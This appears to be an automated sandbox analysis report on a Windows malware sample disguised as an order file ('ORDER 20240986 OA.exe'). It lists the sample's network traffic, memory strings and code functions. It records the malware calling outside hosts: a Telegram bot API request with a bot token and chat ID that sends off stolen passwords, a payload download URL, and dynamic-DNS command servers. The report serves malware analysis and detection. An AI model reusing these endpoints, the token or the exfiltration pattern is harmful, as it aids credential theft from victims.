Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20and%20Time:%2022/11/2024%20/%2006:52:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20897506%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: sierrassinfinusadas.com.ar
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b4a7224cc3aHost: api.telegram.orgContent-Length: 580
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 08:01:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: ORDER 20240986 OA.exe, 00000000.00000000.1676481705.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ORDER 20240986 OA.exe, 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20a
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D65000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D92000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBdq
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C8D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C8D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.bin
Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007718000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.bin3
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF6000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CA8000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F4F000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038D1D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF9000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E28000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E53000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CAF000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F2A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038C84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF6000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CA8000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F4F000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038D1D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF9000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E28000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E53000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CAF000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F2A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038C84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037DC3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037DB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/H
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037DBE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBdq
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown HTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49876 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040543E

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: ORDER 20240986 OA.exe
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process Stats: CPU usage > 49%
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Creates files inside the system directory
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File created: C:\Windows\resources\0809 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_00404C7B 0_2_00404C7B
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_6FBB1B63 0_2_6FBB1B63
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00404C7B 4_2_00404C7B
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015C146 4_2_0015C146
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015D278 4_2_0015D278
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00155362 4_2_00155362
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015C472 4_2_0015C472
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015C738 4_2_0015C738
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015E988 4_2_0015E988
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_001569A0 4_2_001569A0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_001529E0 4_2_001529E0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015CA08 4_2_0015CA08
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015CCD8 4_2_0015CCD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00159DE0 4_2_00159DE0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015CFAA 4_2_0015CFAA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00156FC8 4_2_00156FC8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015E97A 4_2_0015E97A
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0015F961 4_2_0015F961
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00153E09 4_2_00153E09
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07566678 4_2_07566678
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_075687F0 4_2_075687F0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756C150 4_2_0756C150
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07560950 4_2_07560950
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07567E50 4_2_07567E50
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07563B58 4_2_07563B58
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756EC58 4_2_0756EC58
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756A958 4_2_0756A958
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756C142 4_2_0756C142
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07560040 4_2_07560040
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07566B40 4_2_07566B40
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07563B4A 4_2_07563B4A
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07565B48 4_2_07565B48
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07569648 4_2_07569648
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756EC49 4_2_0756EC49
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07566675 4_2_07566675
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756D470 4_2_0756D470
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07561270 4_2_07561270
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07569171 4_2_07569171
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756E77F 4_2_0756E77F
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07564478 4_2_07564478
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07562478 4_2_07562478
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756BC78 4_2_0756BC78
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07560960 4_2_07560960
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07567E60 4_2_07567E60
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756D460 4_2_0756D460
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756A968 4_2_0756A968
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07564468 4_2_07564468
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07560012 4_2_07560012
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07561710 4_2_07561710
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07569B10 4_2_07569B10
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756F111 4_2_0756F111
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756AE1F 4_2_0756AE1F
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07562918 4_2_07562918
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756C618 4_2_0756C618
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07568318 4_2_07568318
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07565219 4_2_07565219
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07562907 4_2_07562907
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756DE00 4_2_0756DE00
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07564908 4_2_07564908
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07567008 4_2_07567008
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756C608 4_2_0756C608
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07566609 4_2_07566609
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07569637 4_2_07569637
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756AE30 4_2_0756AE30
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07566B30 4_2_07566B30
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07563238 4_2_07563238
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756D938 4_2_0756D938
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07565B39 4_2_07565B39
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756D927 4_2_0756D927
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756F120 4_2_0756F120
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756322A 4_2_0756322A
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07565228 4_2_07565228
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07568328 4_2_07568328
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756F5D7 4_2_0756F5D7
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_075604D0 4_2_075604D0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_075674D0 4_2_075674D0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756CAD1 4_2_0756CAD1
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07565FD8 4_2_07565FD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07569FD8 4_2_07569FD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07563FD8 4_2_07563FD8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07565FC7 4_2_07565FC7
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756B7C0 4_2_0756B7C0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_075604C0 4_2_075604C0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756E2C8 4_2_0756E2C8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07569FC8 4_2_07569FC8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_075648F7 4_2_075648F7
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07560DF0 4_2_07560DF0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756DDF0 4_2_0756DDF0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_075616FF 4_2_075616FF
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07569AFF 4_2_07569AFF
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07566FFA 4_2_07566FFA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07561FF8 4_2_07561FF8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756B2F8 4_2_0756B2F8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756CAE0 4_2_0756CAE0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07560DE0 4_2_07560DE0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_075687E0 4_2_075687E0
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_07563FE8 4_2_07563FE8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_0756F5E8 4_2_0756F5E8
